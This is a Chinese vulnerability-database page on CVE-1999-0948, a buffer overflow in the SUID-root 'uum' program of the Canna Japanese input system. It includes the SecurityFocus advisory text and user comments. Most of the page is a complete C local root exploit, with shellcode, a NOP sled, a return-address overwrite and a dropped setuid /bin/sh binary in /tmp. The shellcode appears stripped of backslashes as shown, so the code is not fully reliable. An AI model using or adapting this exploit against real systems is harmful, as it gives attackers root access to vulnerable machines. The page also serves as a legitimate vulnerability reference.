Canna子系统’uum’缓冲区溢出漏洞
漏洞ID | 1105588 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-11-02 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-1999-0948 |
CNNVD-ID | CNNVD-199911-008 |
漏洞平台 | Unix | CVSS评分 | 7.2 |
|漏洞来源
|漏洞详情
Canna输入系统的uum程序存在缓冲区溢出漏洞。本地用户可以获得根权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/757/info
Canna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese.
Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romanji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way.
Canna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion.
The Canna subsystem on certain UNIX versions contains a buffer overflow in the 'uum' program. Uum is a Japanese input tty frontend for Canna. Regrettably, certain versions are vulnerable to a buffer overflow attack via unchecked user supplied data with the '-D' option. Since 'uum' is installed as SUID root this may result in a root level compromise.
/*=============================================================================
/usr/bin/uum Exploit for Linux
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by
UNYUN ([email protected])
=============================================================================
*/
#include <stdlib.h>
#include <stdio.h>
#define RET_ADR 84
#define EXP_ADR 204
#define MAXBUF 300
#define JMP_OFS 0x484
#define NOP 0x90
#define SHELL "/tmp/pp"
#define COMPILER "gcc"
char exec[60]=
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"x80xe8xdcxffxffxff";
char xx[MAXBUF+1];
unsigned int i,ip,sp;
FILE *fp;
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
main()
{
strcat(exec,SHELL);
sprintf(xx,"%s.c",SHELL);
if ((fp=fopen(xx,"w"))==NULL){
printf("Can not write to %sn",xx);
exit(1);
}
fprintf(fp,"main(){setuid(0);setgid(0);system("/bin/sh");}");
fclose(fp);
sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
system(xx);
sp=get_sp();
memset(xx,NOP,MAXBUF);
ip=sp-JMP_OFS;
printf("Jumping address = %xn",ip);
xx[RET_ADR ]=ip&0xff;
xx[RET_ADR+1]=(ip>>8)&0xff;
xx[RET_ADR+2]=(ip>>16)&0xff;
xx[RET_ADR+3]=(ip>>24)&0xff;
strncpy(xx+EXP_ADR,exec,strlen(exec));
xx[MAXBUF]=0;
execl("/usr/bin/uum","uum","-D",xx,(char *) 0);
}
|参考资料
来源:BID
名称:757
链接:http://www.securityfocus.com/bid/757
相关推荐: IRIX Korn Shell (ksh) suid_exec缓冲区溢出漏洞
IRIX Korn Shell (ksh) suid_exec缓冲区溢出漏洞 漏洞ID 1105268 漏洞类型 缓冲区溢出 发布时间 1996-12-02 更新时间 2005-05-02 CVE编号 CVE-1999-1114 CNNVD-ID CNNVD-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666